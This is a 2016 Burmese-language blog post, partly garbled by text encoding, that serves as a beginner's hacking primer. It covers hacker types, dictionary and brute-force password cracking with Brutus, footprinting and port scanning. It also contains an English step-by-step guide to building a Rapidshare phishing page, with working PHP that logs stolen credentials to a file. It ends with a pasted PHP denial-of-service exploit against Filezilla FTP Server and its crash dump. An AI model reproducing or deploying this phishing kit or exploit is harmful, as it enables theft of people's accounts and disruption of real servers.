Saturday, June 11, 2016

Hacking စာမ်ားေလ့လာႏိုင္ပါတယ္ခင္ဗ်ာ

pt;color:rgb(0,0,0);font-style:normal;အေၿခခဵ Hacking နညး့ပညာစာအုပး ။
ဟကးကာ ဆိုတာဘာလညး့ နဲ႔ စာေရ့သူ ရဲံ အၿမငး ။
Hacker ဆိုသညး မွာ သငးယူလို႔ ရေသာ ပညာ မဟုတး ။အသဵု့ခ္ နညး့ပညာ မ္ာ့ကို ေလံလာ ေတြ႔
ရွိၿပီ
့ အာ့နညး့ ခ္ကးကို ရွာေဖြႏိုငးေသာ ပညာ ၿဖစးသညး ။ online ေပၚတြငး hacking နဲ႔ပါတးသတးေသာ
စာအုပးမ္ာ့ စြာ ကိုေတြ႔ဘူ့ၿပီ ။ hacking နဲ႔ ပါတးသတးေသာ website မ္ာ့စြာလညး့ေပၚထြကးေနပါၿပီ ။
vulnerability ေပါငး့ မ္ာ့ စြာ့ ကို hacker ဟုေခၚ ေသာ လူစု ေတြ ရွာေဖြ ေတြ႔ရွိၿပီ့ website
ေပါငး့မ္ာ့စြာေပၚတြငး တငးထာ့ၾကပါတယး ။ tool ေပါငး့မ္ာ့စြာ လညး့ လြယးလငးံတကူ ရရွိႏိုငးပါတယး ။အဲံ
နညး့ပညာရပးေတြ ကိုအသဵု့ၿပဳ တဲံ လူေတြ မွီခို ေနတဲံ လူေတြ လညး့ အမ္ာ့ၾကီ့ပါ ။ဒါေတြ က ဟကးကာ
ေတြ လာ့ဆိုတဲံ ေမ့ခြနး့ ေမ့ႏိုငးပါတယး ။
Tool user level ေတြ ပါ။ hacker ဆိုတာ ပါရမီ အရငး့ခဵ ၿပီ့ ကြနးၿပဴတာ နညး့ပညာ ကိုရူ့သြပး တဲံ
လူ
တေယာကး ရဲံ it ပိုငး့ဆုိငးရာ ေပ္ာံကြကးကို ရွာေတြ႔ႏိုငးခ္ငး ၿဖစးပါတယး ။ white,black,gray လို႔
ေခၚတဲံဟကးကာ့ အမ္ိဳ့အစာ့ သဵု့မ္ိဳ့ခြဲထာ့ပါတယး ။white နဲ႔ black ကေတာ၇ ံ နးသူေပါံ :D ဒါေပမယးံ
အမ္ာ့စု က gray ေတြပါ ။
ဒါဆို က္ေနား ေရ့တဲံ စာအုပး က ေကာ ၊ ဖတးၿပီ့ hacker တေယာကးၿဖစးႏုိငပ း ါၿပီလာ့ လို႔ ေမ့ႏိုငးစရာ
အေၾကာငး့ရွိပါတယး ။ က္ေနားကိုယးတုိငးေတာငးမွာ ဟကးကာ မဟုတးတာ ။ :D ။ က္ေနား
သိတာေလ့ေတြကိုၿပနး share ခ္ငးတဲံ ရညးရြယးခ္ကးကို အဓိက ထာ့ၿပီ့ေရ့ထာ့တာ ပါ ။
က္ေနားေရ့ထာ့တာ က hacking ebook ေတြ website ေတြမွာပါတဲံ hacker ေတြရွာထာ့တဲံ နညး့ပညာ
ေတြ ထညး့ က အသဵု့ှငးၿပီ့ လြယးလငးံ တကူေလ့ေတြကိုေကာကးႏွူတး ထာ့ပါ။ ကိုယးေရ့ထာ့တဲံ
စာအုပးေပမယးံ ႏုိငးငဵ ၿခာ့ က hacking ebook ေတြ က က္ေနားေရ့ထာ့တာ ထကး အဆ
ေပါငး့မ္ာ့စြာပိုမိုေကာငး့ပါတယး ။ ၿဖစးႏိုငးမယးဆုိရငး စာဖတးသူေတြ အေနနဲ႔ က္ေနား ေရ့ထာ့တဲံ တဆငးခဵ
ဘာသာ စကာ့ထကး English လို ebook ေတြ ကိုဖတးမယးဆိုရငး နညး့ပညာပိုငး့ပိုမို တုိ့တတး မွာပါ ။
အဓိက ဒီစာအုပးေလ့ ရဲံ ရညးရြယးခ္ကးက hacking ကိုစေလံလာမယး English လို ကိုဖတးဖုိ႔လညး့
ေၾကာကးေသ့တဲံ သူငယးခ္ငး့ ေတြ အတြကးရညးရြယးလိုကးတာပါ ။ intro ှငးတာလညး့ေတားေတား မ္ာ့ပါၿပီ

Hacker အမ္ိဳ့ အစာ ခြဲၾကရေအာငးဗ္ာ ။
အေပၚမွာလညး့ အနညး့ ငယးေရ့ထာ့ၿပီပါၿပီ ။ black,white and gray ေပါံ။
White ကေတာံ လူေကာငး့ေပါံ ။
Black ကေတာံ လူဆုိ့ေပါံ ။
Gray ကေတာံ အေၿခအေနေပၚပဲမူတညးတယး ။ လူေကာငး့လညး့ၿဖစးနုိငးတယး ။ လူဆုိ့အသြငး့လညး့
အခ္ိနးမေရြ့ေၿပာငး့ႏိုငးတယး ။
ဒါေပမယးံ ပညာရပးတခုကိုတတးထာ့ၿပီ hacker လုိ႔ ၿဖစးေနၿပီဆိုရငး အခ္ိနးမေရြလိုသလို ပညာရပးကို
အသဵု့ခ္ႏိုငးတယးလို႔က္ေနားရဲံ အကိုတေယာကးေၿပာဘူ့တယး ။
ဒါေၾကာငးံ hacker အမ္ာ့စု က white နာမညး ခဵ ေပမယးံ gray ေတြ မ္ာ့ပါတယး ။
ပို
ၿပီ့တိတိၾကၾကခြဲမယး
Tool user hacker, - script kiddies လိုေခၚၾကပါတယး ။ သူတုိ႔ က မ္ာ့ေသာအာ့ၿဖငးံ နညး့ပညာ
ဗဟုသုတေနာကးခဵ မရွိပဲ hacking tool ေတြကိုသဵု့ ၿပီ့ hacker လို႔ အမညး ခဵ ၾကတဲံသူေတြ ပါ ။
Intermediate hacker - နညး့ပညာ ေနာကးခဵ ရွိတယး programming ေတြကိုလညး့
ထို
ကးသငးံသေလာကးသိတယး ။ ဘယး script ေတြ tool ေတြက ဘယးလို အလုပးလုပးတယး ။နာမညးရွိၿပီ့
exploits ေတြကို ထပးဆငးံ ေလံလာၿပီ အာ့နညး့ ခ္ကး အသစးကိုရွာေဖြတတးၾကတယး ။
Elite hacker - သူတုိ႔ ကေတာံ hacking tool ေတြရဲံ အရငး့ အၿမစး ပါပဲ ။ hacking tool ေတြ ကိုေရ့တယး
။ exploits အသစးေတြ ကိုရွာေဖြတယး ။ system တခု ကို ေၿခရာ လကးရာ လဵု့ှ မရွိပဲ ှငးႏုိငးထြကးႏိုငး
ဖ္ကးစီ့ နိုငး ရယူ ႏိုငးတဲံ အစြမး့ရွိၾကပါတယး ။
Hacker နဲ႔ security ပိုငး့ကတြဲ ေနပါတယး။ concept ေလ့ သေဘာေပါကးသြာ့ေအာငး
ေသခ္ာေရ့ထာ့တဲံဟာေလ့ပါ ။
http://www.mmso.org/forum/index.php/topic,722.msg3549.html#msg3549
ကို
မ္ကးနွာမရွိ လူစီဖာ ေရ့ထာ့တာပါ ။
--------------------------။။----------------------။။ ------------------------------------------------
Password နဲ႔ ပါတးသတ သ း မွ္က္ေနာ သ း ိသေလာက း Password ဆိုတာကိုရွငး့ၿပရငးေတာံ က္ေနား ကို ှိုးငး သမခ္ငးေနၾကမွာ ပါ။ Password ဆို တာဘာလညး့ လူတိုငး့သိၿပီ့သာ ။ ဆရာၾကီ့လုပးခ္ငး အုနး့ဆိုၿပီ ။ password ဆိုတာ တခုထညး့ ဆို အေရ့မပါ ေပေမံ username နဲ႔ တြဲလိုကးရငးေတားေတားအေရ့ၾကီ့ပါတယး ။ စာဖတးသူေတြ လညး့ password နဲ႔ပါတးသတးၿပီ့ ေနတိုငး့ ၾကဵဳေတြ႔ဘူ့ၾကပါမွာပါ ။ gtalk ှငးတာေတာငး password နဲ႔ ှငးေနၾကတာ ။ ကိုယးံ gtalk သူမ္ာ့ ခုိ့သြာ့၇ငး ဘယးေလာကး စိတးညစးဖို႔ ေကာငး့လညး့ ၾကဵဳဖူ့တဲံ သူသိမွာပါ ။ password ကို crack လုပးၾကသလို keylogger လို မ္ိဳ့ software ေတြသဵု့ၿပီ့ ခုိ့ယူ ႏိုငးၾကပါတယး ။ Social Engineering ဆိုတဲံ လူရဲံ စိတးေပၚ အေၿခခဵထာ့တဲံ နညး့ ကလညး့ hacker ေတြအတြကး ေတားေတား အသဵု့ ှငးလာပါတယး ။
ေနာကးထကး ပိုၿပီ့ password အေၾကာငး့တိတိက္က္ သိခ္ငးရငး ကို (www.mmso.org ) black devil
ေရ့ထာ့တဲံ password basic ဆိုတဲံ topic ေလ့ က လဵု့ှ အေထာကး အကူ ၿပဳပါတယး ။
http://www.mmso.org/forum/index.php/topic,101.msg426.html#msg426
ႏို
ငးငဵ ၿခာ့ website ရဲံ post တခုပါ ။ ဒါေပမယးံ အဓိက အေရ့ၾကီ့တဲံ အခ္ကး အလကးကိုရွာေဖြထာ့တဲံ ကို
black devil ကုိ အေက့္ဇူ့တငးပါတယး ။
Dictionary Attack password cracking Dictionary လို႔ ေၿပာမွေတာံ Dictionary နဲ႔ password ကို ေဖာကးမွာေပါံ ။ သူရဲံ အေၿခခဵ အလုပးလုပးပဵု က dictionary ထညး့မွာပါတဲံ စာသာ့ နဲ႔ မိမိ password ကိုတိုကးၿပီ့ေဖာကးတဲံ သေဘာပါပဲ ။ dictionary ေကာငး့ေကာငး့တခုေတာံလို အပးပါတယး ။
http://www.mmso.org/forum/index.php/topic,98.msg412.html#msg412 မွ ာ က ( sky walker ) မွ ေဆြ့ေႏြ့ထာ့တာရွိတဲံ အတြကး အဲံဆုိဒးရဲံ လငးံေလ့ခ္ိတးေပ့လိုကးပါတယး ။
Brutus သူကလညး့ dictionary attack ထညး့ ကတခုပါပဲ ။ က္ေနား သူနဲ႔ ပါတးသတး အေၾကာငး့အရာ ဆကးလကးေရ့သာ့ပါမယး ။ brutus ကို window ေပၚမွာ အသဵု့ၿပဳ ၾကတာပါ ။ Brutus ကို http://www.hoobie.net/brutus/ မွာ လြယးလငးံတကူ ယူႏုိငးပါတယး ။ ပထမဆဵု့ ftp server တခု နဲ႔ နမူနာၿပပါမယး ။ ftp ဆိုတာ http နဲ႔ ဆငးတူရို့မွာ တူပါတယး ။ hacker က မိမိ ftp server ကိုရရငး မိမိ server တခု လဵု့ ကို သူၾကိဳကးသလို ၿပငးဆငးသြာ့ႏိုငးပါၿပီ ။ ဒါ က္ေနားရဲံ ftp server လို႔ထာ့ လုိကးပါမယး ။ xxx.xx.x.x ေနရမွာ က္ေနား ftp server ရဲံ Ip ေပါံ ။ ftp port က 21 ပါ ။ 21 မဟုတးရငး က္ေနားတုိ႔ port scan လုပးရမွာပါ ။ Dictionary attack မွာ pass mode Word List လိုအပးပါတယး ။wordlist ကို
http://packetstormsecurity.org/Crackers/wordlists/ မွ သြာ့ယူႏုိငးပါတယး ။ good luck with brutus “D
Brute force attack
အေပၚမွာ ၿပထာ့တဲံအတုိငး့ပဵုစဵတူတူပါပဲ။ brute force attack က မိမိ computer
ရဲံ speed ေပၚမူတညးပါတယး။ computer ေကာငး့လုိ႔cracking program ကို run
တဲံ
speed ၿမနးရငး password cracking ပိုၿမနးမွာပါ။ pass mode ေနရာမွာ brute
force လို႔ၿပငးၿပီ့range မွာ မိမိ crack ခ္ငးတဲံ password ရဲံ length
ကို
မွ
နး့ၿပီ့ထညးံၾကညးံပါ။
\\\\
\\\\
\\\
\\\\
\\\
\\\\\\\\\\\\\\\\\\\\\ //////////////////////////////////////////
Phishing Phishing နဲ႔ပါတးသတးၿပီ့ က္ေနား Phishing ဆိုတဲံ နညး့ ေလ့ အေၾကာငး့ေၿပာခ္ငးတာပါ ။ တကယးံ ေတာံ လိမးတဲံနညး့ေလ့ပါပဲ ။ ၾကာ့ၿဖတးအုပးတယးပဲ ေၿပာေၿပာ တကယးံအသဵု့ ှငးတဲံနညး့ပါ ။ သူမ္ာ့ရဲံ gmail ပဲၿဖစးၿဖစး rapidshare ပဲၿဖစးၿဖစး မညးသညးံ account မဆို လွညးံ ၿပီ့ယူလို႔ရပါတယး ။ သူ ရဲံအလုပးလုပးပဵုကလညး့ ရို့ရွငး့ပါတယး ။ free host, free domain , code script ( မိမိ ဟကးခ္ငးတဲံ ဆိုဒးရဲံ code ပါ ) ၿပီ့ရငး အနညး့ငယး setting ေလ့ၿပငၿးပီ့ရငး ဟကးလို႔ရပါတယး ။ အထူ့ သၿဖငးံ ဆိုဒးေတြ မွာ ေတြ႔သမွ္လငးံ ှငးတတးတဲံသူေတြ ထိတတးပါတယး ။
အလုပးလုပး ပဵုက မူရငး့ ဆုိဒးရဲံ လငးံကို Blog သိဳံမဟုတး ဆုိဒးတခုခု ေပၚမွာေပ့ၿပီ့ အေနာကးမွာ သူရဲံ
phishing script တငးထာ့တဲံ ဆုိဒးရဲံ လငးံ နဲ႔ ခ္ိတးထာ့တယး ။ ဥပမာဆုိပါေတာံ www.gmail.com လို႔
တငးထာ့ေပမယးံ ေနာကးမွာ phishing page ခဵထာ့ခ္ငးၿဖငးံတၿခာ့ လူရဲံ information ကို
လွ
ညးံဖ္ာ့ယူႏုိငးပါတယး ။
http://www.mmso.org/forum/index.php/topic,233.0.html မွ ာ ကို brb, ကို cyberhunter နဲ႔ တၿခာ့ညီ အကိုေတြ ေဆြ့ေႏြ့ ထာ့တာ ေလ့ေတြ အရမး့ ေကာငး့ပါတယး ။ အဲသြာ့ၾကညးံရငး က္ေနားေတာငး Phishing အေၾကာငး့ပါမွ ဆကးေရ့ဖုိ႔ မလိုေတာံပါဘူ့ ။ Simple phishing တခုလုပးမယးဆို ဒိုမိနး့ co.cc ၿဖစးၿဖစး ဘာၿဖစး ရယး webhost ,free ၿဖစးၿဖစး ရရငး အစဥးေၿပပါၿပီ ။ phishing page ေတြကို အဆငးသငးံ ကို cyber hunter ၾကီ့ mmso ဖိုရမး အေပၚ ကလငးံမွာတငးထာ့ပါတယး ။ ကိုယးံဟာကိုလုပးခ္ငးတယးဆုိရငးေတာံ
How to Make A Basic Phisher
here we share how to make basic phishing for beginner , that can trick other people to stole
some information and data
1. we use rapidshare.com as our page example
2. Go to www.rapidshare.com then jump to the premium account log-in screen at the url :
https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
3. click right click on page and view source
4. select and copy all, put in the notepad and save as .txt
5. there is so money random html code but we interest these two method and action.
6. find the words "method" (without quotes) in document
7. i think the result will be same like that : method="post"
8. Change the word post to the word get.
9. then , find again the word named "action"
10. i hope u will see like this action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. replace next.php instead of url , it will be look like action="next.php"
12. Save this file as index.html and make a new document with notepad for next.php , (the
page that they are directed to after you have gotten their log-in information)
13. Copy and paste this code into the notepad document: Code:
CODE
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
14.at "Location: Put your REDIRECT URL Here" u can put ur url here, in this case , i use Code:
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
then save as next.php
15. than open notepad again and make a document name password.txt .because we use the
name password.txt Code:
$handle = fopen("password.txt", "a");
as for me ,i chose password.txt as my file where I want the passes to be
stored, but u can use the name as u like .
16. Go to free host that support php , and upload these 3 files , make use
delete uploaded by webhost ,such as index.html
17. go and check ur url and test as user and password
i hope u be sucess .
က္ေနား www.mmso.org မွာတငးထာ့တာေလ့ ကို ၿပနး ယူသဵု့လုိကးတာပါ ။ Native speaker တေယာကးမဟုတးလို႔
အမွာ့အရြငး့ မ္ာ့ရငး သညး့ခဵ ေပ့ပါ ။ ၿမနးမာလို ၿပနးေရ့ ပါအုနး့မယး ။
ဒါ အလြယးနညး့ပါ ။ phishing တၿခာ့စိတှ း ငးစာ့ဖုိ႔ ေကာငး့တဲံ iframe တို႔ xss တို႔ နဲ႔ တြဲသဵု့ နညး့ေတြကို
ေနာကးပိုငး့ အဆငးေၿပရငး ေဖားၿပေပ့ပါမယး ။
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //////////////////////////////////////////
Footprinting Hacker တေယာကး အဓိက အခ္ကး system တခုကို ဟကးေတာံမယး ဆိုရငး Information အကုနး စုေဆာငး့ဖို႔ လိုအပးပါတယး ။ social engineering ကိုသဵု့ရငးသဵု့ေပါံ ။ ရသမွ္ data အကုနး ယူ ဖို႔ ကလိုအပးပါတယး ။ website ဆုိရငး domain ip တုိ႔ ဘယးက host ယူလညး့ ။ ဘာ system ကို သဵု ့ထာ့လညး့ ဆိုတာ စဵုစမး့ ဖို႔လိုအပးပါတယး ။
http://just-ping.com
http://whois.domaintools.com တို႔ လို site ေတြကို အသဵု့ၿပဳၿပီ့လညး့ရွာေဖြႏိုငးပါတယး ။ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ /////////////////////////////////////////////////Port scanning Port scanning ရဲံ အဓိက ရညးရြယးခ္ကးက opening port ေတြရွာဖုိ႔ ပဲၿဖစးပါတယး ။hacker တေယာကးအတြကး အေၿခခဵၾကတဲံ နညး့ တခုပါ ။ opening port ေတြ သိမွ hack လို႔ လြယးမွာကို။ Hacker အေနနဲ႔ server ေပၚမွာလုပးေနတဲံ services ေတြကိုၾကညးံခ္ငး့ၿဖငးံ vulnerability ေတြကိုရွာႏိုငး ဖို႔ အခြငးံအလနး့ ပိုမ္ာ့လာပါတယး ။ နာမညးၾကီ့တဲံ nmap port scan tool ကိုေဒါငး့ဖို႔ လငးံပါ ။ http://nmap.org/download.html Online ေပၚမွာတၿခာ့ port scanner tool ေကာငး့ေကာငး့ေတြလညး့ အမ္ာ့ၾကီ့ရွိပါတယး ။ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //////////////////////////////////////////////////////// Hacker တေယာကးက server တခုကို ရယူၿပီ့သြာ့ရငးဘာေတြလုပးတတးလညး့ ? ဘာေၾကာငးံ ဟကးကာေတြ ဟကးတာလညး့ ?? လူ ရွုိနးေအာငးဆိုတာေလ့ ကေလ့ ေၿပာတဲံ စကာ့ပါ ။ တကယးံ HACKER စစးတေယာကးက လူ ရွုိနးဖို႔ ေနေနသာသာ မိမိ ကိုယးကိုယး Hacker ၿဖစးေၾကာငး့ သိမွာကို အရမး့ေၾကာကးၾကတယး ။ ဘာလို႔လညး့ဆုိေတာံ Mz က ကိုအငးဖို ေၿပာတာေလ့ သတိရမိတယး ။ စတီ့နဵ သငး့ေတာံမယးဆုိတဲံ စကာ့ေလ :D Hack ထာ့တဲံ မွာ botnet collection ကိုထညးံၿပီ့ ေနာကးပင ို း့ server attack ေတြ ကို အသဵု့ရနး ။ Proxy အေနနဲ႔ တၿခာ့ site ေတြ attack လုပးဖို႔ Rootkit ေတြ ကို ထညးံထာ့ ၿပီ့ ေနာကးတခ္ိနး လိုရငးလို အပးသလို သဵု့ဖုိ႔ ။ Illegal data ေတြကို owner မသိပဲ သိမး့ထာ့ဖို႔ ။ တၿခာ့ information ေတြပါခို့ ဖို႔ အတြကး အေၿခခဵ ရညးရြယးခ္ကးနဲ႔ ဟကးၾကပါတယး ။ အၿမငး ကတး ပုဒးမနဲ႔ ddos နဲ႔သမခဵ ထိတဲံ website ကေတာံ other story ေပါံ ေနား ။ -------------------------။။ -------------------------- ။။---------------------------------------- Exploit Local exploit - system တခု ရဲံ admin or root အေကာငးံ ကို သာမနး user ေနရမွ ရယူလိုကးခ္ငး့ၿဖစးပါတယး ။ Remote exploit – local explit နဲ႔ သေဘာသဘာှခ္ငးတူညီပါတယး ။ ကြဲၿပာ့တာ သူရဲံအဓိက အခ္ကး local မဟုတးပဲ Internet access ရတဲံ ေနရတာတုိငး့ကရယူႏုိငးတာပါပဲ ။Penetrating Hacker တေယာကးအေနနဲ႔ system တခုရဲံ exploit တခုကိုရရငး target ကို ဘယးလိုေရာကးေအာငးသြာ့မလညး့ ။ server ကို ဘယးလို penetrate လုပးမလညး့ဆိုတာ သိဖို႔ က အရမး့ အေရ့ၾကီ့ပါတယး ။ Exploit ေတြကိုရွာဖို႔ အတြကး milw0rm ဆိုတဲံ ဆိုဒး က ညြနး့ခ္ငးပါတယး ။PHP ဒါ MILWORM ထညး့ က PHP အတြကး exploit ပါ ။<?php# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service# by rgod# mail: retrog at alice dot it# site: http://retrogod.altervista.org# tested on WinXP sp2error_reporting(E_ALL);$service_port = getservbyname('ftp', 'tcp');$address = gethostbyname('192.168.1.3');$user="test";$pass="test";$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);if ($socket < 0) {echo "socket_create() failed:\n reason: " . socket_strerror($socket) ."\n";} else {echo "OK.\n";}$result = socket_connect($socket, $address, $service_port);if ($result < 0) {echo "socket_connect() failed:\n reason: ($result) " .socket_strerror($result) . "\n";} else {echo "OK.\n";}$out=socket_read($socket, 240);echo $out;$in = "USER ".$user."\r\n";socket_write($socket, $in, strlen ($in));$out=socket_read($socket, 80);echo $out;$in = "PASS ".$pass."\r\n";socket_write($socket, $in, strlen ($in));$out=socket_read($socket, 80);echo $out;$in = "PASV ".$junk."\r\n";socket_write($socket, $in, strlen ($in));$in = "PORT ".$junk."\r\n";socket_write($socket, $in, strlen ($in));$in = "STOR ".$junk."\r\n";socket_write($socket, $in, strlen ($in));socket_close($socket);/*07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance)----------------------------------------------------------------Exception C0000005 (ACCESS_VIOLATION writing [0000007C])----------------------------------------------------------------EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05--> MOV BYTE PTR [ESI+7C],01----------------------------------------------------------------07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled)----------------------------------------------------------------Exception C0000005 (ACCESS_VIOLATION writing [0000007C])----------------------------------------------------------------EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??

No comments:

Post a Comment